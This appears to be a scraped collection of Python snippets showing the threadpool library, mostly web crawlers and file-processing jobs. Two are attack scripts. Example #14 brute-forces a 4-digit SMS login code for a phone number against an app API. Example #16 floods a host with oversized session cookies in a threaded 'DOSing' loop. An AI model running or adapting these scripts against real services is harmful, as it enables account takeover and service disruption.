Example #1
0
    def getNameSet(self):
        reload(sys)
        sys.setdefaultencoding('utf-8')
        # sys.setdefaultencoding('gbk')
        pool = threadpool.ThreadPool(10)

        # #在IEEE上根据关键字得到搜索页
        # for keyword in keywords:
        #     url = '%s%s%s%s' % ('http://ieeexplore.ieee.org/search/searchresult.jsp?', 'queryText=', keyword, rangeYear)
        #     pageUrlQueue.put(url)
        # requests = threadpool.makeRequests(self.getIeeePages, keywords)
        # [pool.putRequest(req) for req in requests]
        # pool.wait()
        # self.pageWrite('searchPages/ieeePages.txt')

        # # 在ACM上根据关键字得到搜索页
        # for keyword in keywords:
        #     url = '%s%s' % ('http://dl.acm.org/results.cfm?query=', keyword)
        #     pageUrlQueue.put(url)
        # requests = threadpool.makeRequests(self.getACMPages, keywords)
        # [pool.putRequest(req) for req in requests]
        # pool.wait()
        # self.pageWrite('searchPages/acmPages.txt')

        # #根据Ieee的搜索页得到全部document的Url
        # pageUrls = open("searchPages/ieeePages.txt").readlines()
        # for page in pageUrls:
        #     pageUrlQueue.put(page)
        # requests = threadpool.makeRequests(self.getIeeeDocuments, pageUrls[0:10])
        # [pool.putRequest(req) for req in requests]
        # pool.wait()
        # self.docWrite('docUrls/ieeeDocs.txt')

        # #根据acm的搜索页得到全部document的Url
        # pageUrls = open("searchPages/acmPages.txt").readlines()
        # for page in pageUrls:
        #     pageUrlQueue.put(page)
        # requests = threadpool.makeRequests(self.getACMAuthors, pageUrls[0:10])
        # [pool.putRequest(req) for req in requests]
        # pool.wait()
        # self.docWrite('docUrls/acmDocs.txt')

        # #根据acm的搜索页得到全部author的name
        # pageUrls = open("docUrls/acmDocs.txt").readlines()
        # for page in pageUrls:
        #     pageUrlQueue.put(page)
        # requests = threadpool.makeRequests(self.getACMName, pageUrls[0:10])
        # [pool.putRequest(req) for req in requests]
        # pool.wait()
        # self.acmWrite('names/acmNames.txt')

        # # 在ACM上根据关键字得到搜索页
        # for keyword in keywords:
        #     url = '%s%s%s' % ('https://www.elsevier.com/search-results?query=', keyword, '&labels=all')
        #     pageUrlQueue.put(url)
        # numbers = range(0, 10)
        # requests = threadpool.makeRequests(self.getElsDocs, numbers)
        # [pool.putRequest(req) for req in requests]
        # pool.wait()
        # self.pageWrite('searchPages/elsevierPages.txt')

        #根据Ieee的搜索页得到全部document的Url
        num = range(0, 10)
        pageUrls = open("docUrls/ieeeDocs.txt").readlines()
        for page in pageUrls:
            pageUrlQueue.put(page)
        requests = threadpool.makeRequests(self.getIeeeName, num)
        [pool.putRequest(req) for req in requests]
        pool.wait()
Example #2
0
def judeg_id_list(all_tag_list, cluster_item_tag_abpath_list, result_id_path,
                  cut_pic_name, cluster_id_name, IPC_check, mode,
                  cluster_id_search_range_list):
    cp_list = []
    fun_var = []
    for tag in all_tag_list:
        flag = 0
        id_term = ""
        result_list = my_finds(tag, 0, cluster_item_tag_abpath_list)
        cluster_id_name_flag = 0
        cut_pic_name_flag = 0
        ipc_num_flag = 0
        for result_item in result_list:
            if cluster_id_name_flag == 0:
                if cluster_id_name not in result_item[1]:  #判断身份信息是否聚类成功
                    continue
                else:
                    id_term = result_item[1].split(path_char)[-1].split(".")[0]
                    if mode == "multi_pic":
                        id_term = result_item[1].split(path_char)[-2]
                    cluster_id_name_flag = 1

            #添加时间范围限制
            id_search_range_find = my_find(id_term, 0,
                                           cluster_id_search_range_list)
            if id_search_range_find != []:
                id_search_range = id_search_range_find[1:]
            if result_item[1] not in id_search_range:
                continue

            if mode == "check_pic":
                if ipc_num_flag == 0:
                    print result_item[1]
                    ipc_num = result_item[1].split(path_char)[-2].split("_")[0]
                    if ipc_num not in IPC_check:
                        continue
                    else:
                        ipc_num_flag = 1
            else:
                if cut_pic_name_flag == 0:
                    if cut_pic_name not in result_item[1]:  #判断是否包含其他摄像头信息
                        continue
                    else:
                        cut_pic_name_flag = 1
            if mode == "check_pic":
                if not os.path.exists(os.path.join(result_id_path, id_term)):
                    print "mkdir", os.path.join(result_id_path, id_term)
                    os.mkdir(os.path.join(result_id_path, id_term))
                flag = 1
                break
            else:
                flag = 1
                break

        if flag == 1:
            cnt = 0
            for result_item in result_list:
                #添加时间限制
                id_search_range_find = my_find(id_term, 0,
                                               cluster_id_search_range_list)

                cnt = cnt + 1
                print cnt, "/", len(result_list)
                if cluster_id_name in result_item[1]:
                    print "check-proc"
                    print result_item[1]
                    print os.path.join(result_id_path, id_term,
                                       id_term + ".jpg")
                    json_path = result_item[1].split(".")[0] + ".json"
                    #shutil.copyfile(result_item[1],os.path.join(result_id_path,id_term,id_term + ".jpg"))
                    if mode == "check_pic":
                        cp_list.append([
                            result_item[1],
                            os.path.join(result_id_path, id_term,
                                         id_term + ".jpg")
                        ])
                        cp_list.append([
                            json_path,
                            os.path.join(result_id_path, id_term,
                                         id_term + ".json")
                        ])
                #elif mode == "multi_pic":
                #    for img in os.listdir(result_item[1]):
                #        img_path = os.path.join(result_item[1], img)
                #        cp_list.append([img_path, os.path.join(result_id_path, id_term, img)])
                else:
                    print "multi-proc"
                    print result_item[1]

                    if id_search_range_find != []:
                        id_search_range = id_search_range_find[1:]
                    if result_item[1] not in id_search_range:
                        continue

                    for img in os.listdir(result_item[1]):
                        img_path = os.path.join(result_item[1], img)
                        #print img_path
                        #print os.path.join(result_id_path, id_term, img)
                        #shutil.copyfile(img_path,os.path.join(result_id_path, id_term, img))
                        cp_list.append([
                            img_path,
                            os.path.join(result_id_path, id_term, img)
                        ])

    # for ele in cp_list:
    #     try:
    #         shutil.copyfile(ele[0],ele[1])
    #     except Exception as e:
    #         print(e)

    for i in range(0, len(cp_list)):
        cpfile_A = cp_list[i][0]
        cpfile_B = cp_list[i][1]
        fun_var.append(([cpfile_A, cpfile_B, i, len(cp_list) - 1], None))
    pool = threadpool.ThreadPool(10)
    requests = threadpool.makeRequests(cp_exec, fun_var)
    [pool.putRequest(req) for req in requests]
    pool.wait()
exception_handler = logging.FileHandler('exception.log')

process_handler.setFormatter(formatter)
exception_handler.setFormatter(formatter)

process_log.addHandler(process_handler)
exception_log.addHandler(exception_handler)

# 访问图片前缀
prefix = 'http://image.media.lianjia.com'
subprefix = '!m_fit,w_300,h_300'
# 根据url下载图片

# 保存图像文件名的队列
req_queue = Queue.Queue(256)
download_pool = threadpool.ThreadPool(16)
# request id
global request_id
request_id = int(time.time())
q = threading.Lock()

# 解析请求中的数据把数据存放到队列中
# Args:
#     req_data: 请求数据
# Returns:
#        None


def download_and_generate_hash(img_url, result, ret, request_seq):
    try:
        # 判断img_url 是否为空
Example #4
0
def multi_run(uids, keyword):
    pool = threadpool.ThreadPool(10)
    args_list = [{'uid': uid, 'keyword': keyword} for uid in uids]
    reqs = threadpool.makeRequests(run, args_list)
    [pool.putRequest(req) for req in reqs]
    pool.wait()
Example #5
0
def get_output2(data):
    pool = threadpool.ThreadPool(40)
    requests = threadpool.makeRequests(find_ans2, data)
    [pool.putRequest(req) for req in requests]
    pool.wait()
Example #6
0
from common.common_test import *
"""
参考:
    忘了哪个网站了
    《Python 核心编程》
目录:
    1、使用threadpool
    2、threading_demo.py使用的concurrent.future下的ThreadPoolExecutor
    ...
"""

# 可以指定1-7执行哪些程序,或者指定为[0]执行全部
exe_list = [0]

print('1、使用threadpool')


def func(num):
    print('num:' + repr(num))


if is_exec_curr(exe_list, 1) and __name__ == '__main__':
    res = list(range(100))
    pool = threadpool.ThreadPool(20)  # 20个线程
    requests = threadpool.makeRequests(func,
                                       res)  # 生成线程要执行的所有线程,第一个参数为函数名,第二个参数是传的值
    for request in requests:
        pool.putRequest(request)
    # [pool.putRequest(request) for request in requests]  # 与上面的for循环等价
    pool.wait()  # 等待,其他线程执行结束
Example #7
0
            flag = 1
        except Exception as e:
            print(userid + "****" + "Error!!! " + e.message + "\n")
            errorTime += 1
            time.sleep(10)
    if flag == 1:
        successusers.append(userid)
    if len(successusers) % 25 == 0:
        writer = open('D:\users\\v-zhaozl\Weibo\\' + "Success", 'w')
        for s in successusers:
            writer.write(s + "\n")
        writer.close()
    print(userid + " End")


all_the_text = []
file_object = open('D:\users\\v-zhaozl\Weibo\weiboids.txt', 'r')
try:
    all_the_text = file_object.read()
finally:
    file_object.close()

userids = []
for text in all_the_text.split("\n"):
    userids.append(text.split("\t")[1])

pool = threadpool.ThreadPool(10)
requests = threadpool.makeRequests(threadFun, userids)
[pool.putRequest(req) for req in requests]
pool.wait()
Example #8
0
                shop_name
        ) > 0 and '共<span id="J_resCount">0</span>件商品' not in response.text:
            msg = shop_name
            vender_id = doc("#vender_id").val()
            if vender_id and len(vender_id) > 0:
                print(shop_name)
            else:
                msg = '空'
        else:
            msg = '无'
        file_info = str(shopId) + "\t" + str(vender_id) + "\t" + msg
        with open(cross_files, "a+", encoding='utf-8') as w:
            w.write(file_info)
            w.write('\n')

        gc.collect()
    except IOError:
        gc.collect()
        time.sleep(3)
        run_page(shopId)


make_data()

del cross_start
pool = thread_pool.ThreadPool(15)
rt = thread_pool.makeRequests(run_page, shop_list)
[pool.putRequest(req) for req in rt]
pool.wait()
print('Done!')
Example #9
0

def md5(s):
    m = hashlib.md5()
    m.update(s.encode("utf-8"))
    return m.hexdigest()


gdict = {
    'todo_url_list': set(list()),
    'all_url_list': set(list()),
}
all_url_list = set(list())
undonejobs = dict()
threadnum = 16
downpool = threadpool.ThreadPool(threadnum / 2)
pagepool = threadpool.ThreadPool(threadnum)
downlock = threading.Lock()
tasknum = 0


def unifyurl(baseurl, href):
    # 检测相对url
    if baseurl is not None:
        baseurl = baseurl.strip()  # 去空格
    if href is not None:
        href = href.strip()
    if baseurl is not None:
        if href.startswith('//'):
            href = baseurl.split('//')[0] + href
        elif href.startswith('/'):
Example #10
0
    OSTYPE = 'windows'
elif 'posix' in os.name:
    OSTYPE = 'linux'
else:
    Log.info('不识别的系统类型')
    sys.exit(-1)

# 设置代理信息,如果服务器无法连接外网需要设置代理连接
if 'ON' in use_proxy:
    socks.set_default_proxy(socks.SOCKS5, PROXY_HOST, PROXY_PORT, True,
                            PROXY_USER, PROXY_PAWD)
    socket.socket = socks.socksocket

# 获取开机线程的个数,开启线程池。获取订单对时间和编号进行并行操作
threadNum = inCfg['TOOL']['thread']
pool = threadpool.ThreadPool(int(threadNum))

# 手动执行跟2个参数,卫星明和时间段
if len(args) == 2:
    Log.info(u'手动运行订购程序 -----------------------------')

    satID = args[0]  # 卫星全名
    str_time = args[1]  # 程序执行时间范围

    # 进行时间的解析,由YYYYMMDD-YYYYMMDD 转为datetime类型的开始时间和结束时间
    date_s, date_e = pb_time.arg_str2date(str_time)

    # 重新根据数据规则定义时间清单
    NumDateDict1 = {}
    NumDateDict2 = {}
    # 定义参数List,传参给线程池
Example #11
0
#coding=utf8
import threadpool
import time
import urllib2

urls = [
    'http://www.163.com', 'http://www.amazon.com', 'http://www.ebay.com',
    'http://www.alibaba.com'
]


def myRequest(url):
    resp = urllib2.urlopen(url)
    print url, resp.getcode()


def timeCost(request, n):
    print "Elapsed time: %s" % (time.time() - start)


start = time.time()
pool = threadpool.ThreadPool(4)  #ThreadPool(poolsize)  表示最多可以创建poolsize这么多线程
reqs = threadpool.makeRequests(
    myRequest, urls,
    timeCost)  #makeRequests(some_callable, list_of_args, callback)
[pool.putRequest(req) for req in reqs]
pool.wait()
Example #12
0
import time
import threadpool


#先用pip install threadpool 检查是否安装
#执行比较耗时的函数,需要开启多线程
def get_html(url):
    time.sleep(3)
    print(url)


urls = [i for i in range(10)]  #生成10个数 for的简洁写法
pool = threadpool.ThreadPool(10)  #建立线程池  开启10个线程

requests = threadpool.makeRequests(get_html, urls)  #提交10个任务到线程池

for req in requests:  #开始执行任务
    pool.putRequest(req)  #提交

pool.wait()  #等待完成
Example #13
0
 def run(self, ids):
     pool = threadpool.ThreadPool(12)
     request = threadpool.makeRequests(self.spider, ids)
     [pool.putRequest(req) for req in request]
     pool.wait()
Example #14
0
        'sumbit': 'getMobileCode'
    }
    #submit=getMobileCode&mobile=&v=i6.0.1&vc=AppStore&vd=ae8fbfa52daac979&lang=zh-Hans
    headers = {'User-Agent': '6.0.1 rv:1537 (iPhone; iPhone OS 7.0.4; zh_CN)'}
    url = "http://app6.117go.com/demo27/php/loginAction.php?submit=getMobileCode&mobile=%s&v=i6.0.1&vc=AppStore&vd=ae8fbfa52daac979&lang=zh-Hans" % phone
    try:
        req = requests.get(url, headers=headers, timeout=3)
        print req.url
        req_result = json.loads(req.content)['OK']
    except Exception, e:
        print e
        sys.exit(1)
    if int(req_result) == 0:
        print "code have sent"


if __name__ == '__main__':
    args = []
    status = 0
    if len(sys.argv) != 2:
        print "usage: %s phone" % sys.argv[0]
        sys.exit(1)
    phone = sys.argv[1]
    send_code()
    for i in range(1000, 9999):
        args.append(i)
    pool = tp.ThreadPool(5)
    reqs = tp.makeRequests(checkcode, args)
    [pool.putRequest(req) for req in reqs]
    pool.wait()
 def get(self):
     pool = threadpool.ThreadPool(10)
     requests = threadpool.makeRequests(self._get, self.urls)
     [pool.putRequest(req) for req in requests]
     pool.wait()
Example #16
0
    _WebTmp = _WebTmp[0]
    _WebTmp = _WebTmp.split('\'')
    _WebTmp = _WebTmp[len(_WebTmp) - 1]
    _WebTmp = _WebTmp.split('=')
    _SessionID = _WebTmp[0]
    _Session = _WebTmp[1]

    for i in range(4000):
        _Session += randomCharacter()

    _Cookies = {_SessionID: _Session}

    while True:
        _Flag += 1
        try:
            _Req = requests.get(_Host, cookies=_Cookies, headers=HEADER)
            print "[%s] DOSing... " % _Flag
            print _Req.content
        except:
            continue


if __name__ == '__main__':
    args = []
    for i in range(THREAD_NUM):
        args.append(args)
    pool = tp.ThreadPool(THREAD_NUM)
    reqs = tp.makeRequests(exploit, args)
    [pool.putRequest(req) for req in reqs]
    pool.wait()
Example #17
0
def run(args):
    pool = threadpool.ThreadPool(5)
    requests = threadpool.makeRequests(parseArticleWithAccount, args)
    [pool.putRequest(req) for req in requests]
    pool.wait()
def predict_my(visual=True, model_weight="model_final.pth"):
    cfg.MODEL.WEIGHTS = os.path.join(cfg.OUTPUT_DIR, model_weight)
    predictor = DefaultPredictor(cfg)
    cfg.TEST.DETECTIONS_PER_IMAGE = 500
    # test_json= "/root/data/rubzz/ruby/ruby_output/test/person/split_test_method2_person.json"
    # test_image_path="/root/data/rubzz/ruby/ruby_output/test/person/split_test_method2_person"
    # test_json="/root/data/gvision/dataset/predict/person/test_person.json"
    # test_image_path="/root/data/gvision/dataset/predict/person/img"
    test_json = "/root/data/rubzz/ruby/ruby_output/test/person/img_testone/test_person_onetest.json"
    test_image_path = '/root/data/rubzz/ruby/ruby_output/test/person/img_testone'
    dataset_test_dicts = json.load(open(test_json, "r"))
    # MetadataCatalog.get("pandahead").set(thing_classes=["head"], thing_dataset_id_to_contiguous_id={1: 0})
    train_dicts_metadata = MetadataCatalog.get("pandahead")
    print("metadata----------------", train_dicts_metadata)
    print("predict-------------------start")
    "thing_classes=['visible body', 'full body', 'head', 'vehicle'], thing_dataset_id_to_contiguous_id={1: 0, 2: 1, 3: 2, 4: 3}"
    os.makedirs(os.path.join(cfg.OUTPUT_DIR, "my_predict"), exist_ok=True)
    # for j,(file_name,dict_value) in  enumerate(random.sample(dataset_test_dicts.items(),5)):

    # pbar = tqdm(total=len(dataset_test_dicts), ncols=50)
    import threadpool
    func_var = [([file_name, dict_value], None)
                for file_name, dict_value in dataset_test_dicts.items()]

    def sayhello(file_name, dict_value):
        coco_list_results = []
        print("{}------------------{}\t{}".format(
            os.path.join(test_image_path, file_name), model_weight[6:-4],
            len(dataset_test_dicts.keys())),
              flush=True)
        img = cv2.imread(os.path.join(test_image_path, file_name))
        pre_output = predictor(img)
        num_instance = 0
        cid = [0, 0, 0, 0]
        pre_instances = pre_output['instances']
        if "instances" in pre_output and len(pre_instances) != 0:
            coco_list_result, num_instance, cid = instances_to_coco_json(
                pre_instances.to(torch.device("cpu")), dict_value["image id"])
            coco_list_results = coco_list_results + coco_list_result
        srcfile, paras = file_name.split('___')
        srcfile = srcfile.replace('_IMG', '/IMG')
        image_id = srcfile[-2:]
        scale, left, up = paras.replace('.jpg', '').split('__')
        if visual and (up == "16480" or up == "12360"):
            print("visual-------------------------", file_name)
            cv2.putText(
                img,
                f"len:{num_instance} c1:{cid[0]} c2:{cid[1]} c3:{cid[2]} c4:{cid[3]}",
                (15, 80), cv2.FONT_HERSHEY_SIMPLEX, 1.5, (138, 0, 255), 4)
            v = Visualizer(
                img[:, :, ::-1], metadata=train_dicts_metadata,
                scale=1)  # ColorMode.SEGMENTATION or ColorMode.IMAGE_BW)
            v = v.draw_instance_predictions(
                pre_instances.to("cpu"))  #draw xyxy
            os.makedirs(os.path.join(cfg.OUTPUT_DIR,
                                     "d2_predict_split_visual_17_01"),
                        exist_ok=True)
            cv2.imwrite(
                os.path.join(
                    cfg.OUTPUT_DIR, "d2_predict_split_visual_17_01",
                    "visual{}_{}".format(model_weight[6:-4], file_name)),
                v.get_image()[:, :, ::-1])

    #     pbar.update(1)
    # pbar.close()

    pool = threadpool.ThreadPool(500)
    requests = threadpool.makeRequests(sayhello, func_var)
    [pool.putRequest(req) for req in requests]
    pool.wait()

    # for file_name,dict_value in dataset_test_dicts.items():
    #     # print("{}\t{}------------------{}\t{}".format(os.path.join(test_image_path,file_name),j,model_weight[6:-4],len(dataset_test_dicts.keys())),flush=True)
    #     img=cv2.imread(os.path.join(test_image_path,file_name))
    #     pre_output =predictor(img)
    #     num_instance=0
    #     cid=[0,0,0,0]
    #     pre_instances=pre_output['instances']
    #     if "instances" in pre_output and len(pre_instances)!=0:
    #         coco_list_result,num_instance,cid=instances_to_coco_json(pre_instances.to(torch.device("cpu")),dict_value["image id"])
    #         coco_list_results=coco_list_results+coco_list_result
    #     srcfile, paras = file_name.split('___')
    #     srcfile =srcfile.replace('_IMG', '/IMG')
    #     image_id=srcfile[-2:]
    #     scale, left, up = paras.replace('.jpg', '').split('__')
    #     if visual and (up=="16480" or up=="12360"):
    #         print("visual-------------------------",file_name)
    #         cv2.putText(img, f"len:{num_instance} c1:{cid[0]} c2:{cid[1]} c3:{cid[2]} c4:{cid[3]}", (15,80), cv2.FONT_HERSHEY_SIMPLEX, 1.5, (138,0,255), 4)
    #         v = Visualizer(img[:, :, ::-1],metadata=train_dicts_metadata, scale=1)# ColorMode.SEGMENTATION or ColorMode.IMAGE_BW)
    #         v = v.draw_instance_predictions(pre_instances.to("cpu"))#draw xyxy
    #         os.makedirs(os.path.join(cfg.OUTPUT_DIR,"d2_predict_split_visual_17_01"),exist_ok=True)
    #         cv2.imwrite(os.path.join(cfg.OUTPUT_DIR,"d2_predict_split_visual_17_01","visual{}_{}".format(model_weight[6:-4],file_name)),v.get_image()[:, :, ::-1])
    tempc = os.path.join(
        cfg.OUTPUT_DIR, "my_predict",
        f"{model_weight[6:-4]}_nms{cfg.MODEL.RETINANET.NMS_THRESH_TEST}_fs{cfg.MODEL.RETINANET.SCORE_THRESH_TEST}_17_01.json"
    )
    print(tempc)
    f1 = open(tempc, 'w')
    f1.write(json.dumps(coco_list_results, cls=MyEncoder))
    print("predict----------------end")
Example #19
0
 def __init__(self, maxsize=20, q_size=20, resq_size=200, name=None):
     #self.workingq = queue.Queue(maxsize)
     self.tpool = threadpool.ThreadPool(maxsize,
                                        q_size=q_size,
                                        resq_size=resq_size)
Example #20
0
    for district in districts:
        areas_of_district = get_areas(city, district)
        print('{0}: Area list:  {1}'.format(district, areas_of_district))
        # 用list的extend方法,L1.extend(L2),该方法将参数L2的全部元素添加到L1的尾部
        areas.extend(areas_of_district)
        # 使用一个字典来存储区县和板块的对应关系, 例如{'beicai': 'pudongxinqu', }
        for area in areas_of_district:
            area_dict[area] = district
    print("Area:", areas)
    print("District and areas:", area_dict)

    # 准备线程池用到的参数
    nones = [None for i in range(len(areas))]
    city_list = [city for i in range(len(areas))]
    args = zip(zip(city_list, areas), nones)
    # areas = areas[0: 1]   # For debugging

    # 针对每个板块写一个文件,启动一个线程来操作
    pool_size = thread_pool_size
    pool = threadpool.ThreadPool(pool_size)
    my_requests = threadpool.makeRequests(collect_area_ershou, args)
    [pool.putRequest(req) for req in my_requests]
    pool.wait()
    pool.dismissWorkers(pool_size, do_join=True)  # 完成后退出

    # 计时结束,统计结果
    t2 = time.time()
    print("Total crawl {0} areas.".format(len(areas)))
    print("Total cost {0} second to crawl {1} data items.".format(
        t2 - t1, total_num))
Example #21
0
        # if comm_num>0:#如果有评论就提交
        #     id_comm_dict[item_id]=get_comm.delay(inner_url,comm_num)

        shop_info_data = get_shop_info(inner_url)

        price = item.select("div.p-price strong i")[0].text
        book_name = item.select('div.p-name em')[0].text
        shop_info_data['book_name'] = book_name
        shop_info_data['price'] = price
        shop_info_data['comm_num'] = comm_num
        shop_info_data['item_id'] = item_id
        print(shop_info_data)
        write_csv(shop_info_data)


if __name__ == '__main__':
    keyword = input('请输入要搜索的书:')
    urls = []
    for i in range(5, 7, 2):
        url = 'https://search.jd.com/Search?keyword={}&suggest=1.def.0.V05--38s0&wq={}&page={}&s=101&click=0'.format(
            keyword, keyword, i)

        urls.append(([
            url,
        ], None))
    pool = threadpool.ThreadPool(3)
    reque = threadpool.makeRequests(get_index, urls)
    for c in reque:
        pool.putRequest(c)
    pool.wait()
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36"
}
main_url = "https://www.ixdzs.com"


def get_conn():
    conn = MySQLdb.connect(host='localhost',
                           port=3306,
                           user='******',
                           passwd='',
                           db='jianghuiyan',
                           charset='utf8')
    return conn


task_pool = threadpool.ThreadPool(15)

request = requests.session()
request.keep_alive = False
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def get_response(url):
    for i in range(1, 4):
        try:
            response = request.get(url, timeout=10, verify=False)
            return response
        except BaseException as e:
            print(e)
            print("获取" + url + "失败")
Example #23
0
def thread_main(item):
    pool = threadpool.ThreadPool(4)
    tasks = threadpool.makeRequests(get_detail, item)
    [pool.putRequest(req) for req in tasks]
    pool.wait()
Example #24
0
    labels = df.values
    m = {}
    for val in labels:
        m[val[0]] = val[1]
    params = []
    idx = 0
    for root, dirs, filenames in os.walk(cfg.data_neg_path):
        for each_tif in filenames:
            if '.tif' in each_tif:
                name = each_tif.split('.')[0]
                flag = 'pos' if m[int(name)] == 'Positive' else 'neg'
                path = os.path.join(root, each_tif)  # ./EDCP/data_append/1/1.tif
                out_patch_path = os.path.join(cfg.patch_data, flag, name)  # ./EDCP_PATCH/pos/1/
                idx += 1
                params.append([path, args.size, args.scale, out_patch_path, args.patch_size, args.nums, args.bin, args.threshold])

    # print(idx)
    cp('(#b)total_img:\t{}(#)'.format(idx))
    pool = threadpool.ThreadPool(args.poolsize)
    requests = threadpool.makeRequests(work, params)
    [pool.putRequest(req) for req in requests]
    pool.wait()








Example #25
0
def login_parser(username, password):
    s = requests.Session()
    s.proxies = constant.PROXY
    s.verify = False
    s.headers.update({'Referer': constant.LOGIN_URL})

    s.get(constant.LOGIN_URL)
    content = s.get(constant.LOGIN_URL).content
    html = BeautifulSoup(content, 'html.parser')
    csrf_token_elem = html.find('input', attrs={'name': 'csrfmiddlewaretoken'})

    if not csrf_token_elem:
        raise Exception('Cannot find csrf token to login')
    csrf_token = csrf_token_elem.attrs['value']

    login_dict = {
        'csrfmiddlewaretoken': csrf_token,
        'username_or_email': username,
        'password': password,
    }
    resp = s.post(constant.LOGIN_URL, data=login_dict)
    if 'Invalid username/email or password' in resp.text:
        logger.error('Login failed, please check your username and password')
        exit(1)

    html = BeautifulSoup(s.get(constant.FAV_URL).content, 'html.parser')
    count = html.find('span', attrs={'class': 'count'})
    if not count:
        logger.error("Can't get your number of favorited doujins. Did the login failed?")

    count = int(count.text.strip('(').strip(')').replace(',', ''))
    if count == 0:
        logger.warning('No favorites found')
        return []
    pages = int(count / 25)

    if pages:
        pages += 1 if count % (25 * pages) else 0
    else:
        pages = 1

    logger.info('You have %d favorites in %d pages.' % (count, pages))

    if os.getenv('DEBUG'):
        pages = 1

    ret = []
    doujinshi_id = re.compile('data-id="([\d]+)"')

    def _callback(request, result):
        ret.append(result)

    thread_pool = threadpool.ThreadPool(5)

    for page in range(1, pages + 1):
        try:
            logger.info('Getting doujinshi ids of page %d' % page)
            resp = s.get(constant.FAV_URL + '?page=%d' % page).text
            ids = doujinshi_id.findall(resp)
            requests_ = threadpool.makeRequests(doujinshi_parser, ids, _callback)
            [thread_pool.putRequest(req) for req in requests_]
            thread_pool.wait()
        except Exception as e:
            logger.error('Error: %s, continue', str(e))

    return ret
Example #26
0
    def __init__(self, config_file, _password):
        """Netconfigit constructor

        Initializes member variables and reads and parses XML configuration file.
        Starts local tftp server and creates temporary directory for holding configs.
        Initializes the device threadpool.

        :param config_file: XML configuration file path
        :param _password: decryption password
        """
        # initialize member variables
        self.device_list = []               # list of device objects defined in the configuration file
        self.device_count = 0               # the number of devices defined in the configuration file
        self.success_list = []              # the list of device actions that have succeeded
        self.failure_list = []                 # the list of device actions that have failed
        self.config = 0                     # the minidom XML configuration data structure
        self.config_devices = 0             # pointer to the device elements in the config minidom structure
        self.tftp_thread = 0                # thread pool for running the local tftp server
        self.device_threadpool = 0          # thread pool for running device actions
        self.password = ""                  # decryption password
        self.verbose = 0                    # verbose logging flag
        self.logfile = "./Netconfigit.log"  # logfile relative path
        self.plaintext_passwords = ""       # boolean value allows use of plaintext passwords in config xml
        self.transfer_ip = ""               # IP address of the local tftp and/or scp server
        self.scp_username = ""              # username used for scp transfer to the local machine
        self.scp_password = ""              # password used for scp transfer to the local machine
        self.scp_chown = ""                 # the group and user to which uploaded files' ownership should be changed
        self.ssh_port = 22                  # port used to ssh to local machine - used by chown
        self.repo_path = ""                 # absolute path to the configuration repository
        self.repo_password = ""             # password for accessing the repository
        self.repository = None              # GitPython repository object
        self.tftp_port = "69"               # port used by local tftp server
        self.tftp_root = ""                 # root directory used by local tftp server
        self.using_git = 0                  # boolean is set to true if the repository directory is a Git repository
        self.tempdir = ".netconfigit/"      # temporary path for downloading configs
        self.time_start = datetime.now()    # starting time timestamp used for calculating total running-time
        self.time_stop = None               # stopping time timestamp used for calculating total running-time
        self.time_timestamp = time.time()               # starting time timestamp

        # formatted timestamp
        self.timestamp = datetime.fromtimestamp(self.time_timestamp).strftime('%Y-%m-%d %H:%M:%S')

        # create the object used for encrypting/decrypting passwords
        self.password = aescrypt.AESCrypt(_password)

        # parse xml configuration file
        self.config = minidom.parse(config_file)
        logging.info("\nUsing %s", config_file)

        # check and load options from XML
        self.options = self.load_options()

        # check existence of devices in configuration
        if self.config.getElementsByTagName('device'):
            self.config_devices = self.config.getElementsByTagName('device')
        else:
            print "\nNo devices specified - quitting"
            exit(1)

        # load devices from XML configuration into device_list
        load_err = self.load_devices_xml()

        if load_err != "0":
            print load_err
            print "Configuration errors detected - quitting"
            exit(1)

        # create temporary directory for receiving configs
        self.tempdir = os.path.dirname(self.tftp_root + self.tempdir)
        try:
            os.stat(self.tempdir)
        except os.error:
            os.mkdir(self.tempdir)
            logger.info("Creating temporary directory " + self.tempdir)

        # initialize the thread used for the local tftp server and start the server
        self.tftp_thread = threadpool.ThreadPool(1)
        self.tftp_thread.add_task(self.tftp_server)

        # initialize the thread pool used by device actions
        logger.info("Creating %s device threads", 20)
        self.device_threadpool = threadpool.ThreadPool(20)
Example #27
0
def get_clean_result(id_relation_path, id_score_clean_path, id_clean_result):
    cp_list = []
    fun_var = []
    #获取鲜活监控照文件
    id_path_list, id_path_pic_list = get_live_pic_path_list(id_relation_path)
    #获取清洗打分路径
    id_cluster_clean_path = id_score_clean_path.replace(
        "id_score.txt", "id_cluster.txt")
    print id_cluster_clean_path
    id_cluster_clean_handle = open(id_cluster_clean_path, "r")
    lines = id_cluster_clean_handle.readlines()
    id_cluster_clean_handle.close()
    #定义聚类信息列表,待查询
    cluster_info = []
    cnt = 0
    for line in lines:
        cnt = cnt + 1
        print "get_clean_cluster_info:", cnt, "/", len(lines)
        line = line.strip("\n")
        tag = line.split("@")[-1]
        id_path_pic = line.split("@")[0]
        id_path = id_path_pic.split("#")[0]
        if [id_path_pic, tag, id_path] not in cluster_info:
            cluster_info.append([id_path_pic, tag, id_path])

    cnt = 0
    for id_path_pic in id_path_pic_list:
        cnt = cnt + 1
        print "get_clean:", cnt, "/", len(id_path_pic_list)
        #找到鲜活监控照对应的tag
        live_cluster_info_find = my_find(id_path_pic, 0, cluster_info)
        if live_cluster_info_find == []:
            continue
        live_cluster_info_tag = live_cluster_info_find[1]
        #获取对应的身份信息
        live_cluster_info_id_path = live_cluster_info_find[0].split("#")[0]
        #查询相同id的list
        live_cluster_info_finds = my_finds(live_cluster_info_id_path, 2,
                                           cluster_info)
        if live_cluster_info_finds == []:
            continue
        for live_cluster_info in live_cluster_info_finds:
            img_path = path_char.join(live_cluster_info[0].split("#"))
            img_name = live_cluster_info[0].split("#")[-1]
            tag_check = live_cluster_info[1]
            if tag_check != live_cluster_info_tag:
                id_name = live_cluster_info_id_path.split(path_char)[-1]
                if not os.path.exists(os.path.join(id_clean_result, id_name)):
                    print "mkdir", os.path.join(id_clean_result, id_name)
                    os.mkdir(os.path.join(id_clean_result, id_name))
                cp_list.append([
                    img_path,
                    os.path.join(id_clean_result, id_name, img_name)
                ])

    for i in range(0, len(cp_list)):
        cpfile_A = cp_list[i][0]
        cpfile_B = cp_list[i][1]
        fun_var.append(([cpfile_A, cpfile_B, i, len(cp_list) - 1], None))
    pool = threadpool.ThreadPool(10)
    requests = threadpool.makeRequests(cp_exec, fun_var)
    [pool.putRequest(req) for req in requests]
    pool.wait()
Example #28
0
def main():
    l = ['11111','22222','33333','44444','55555']
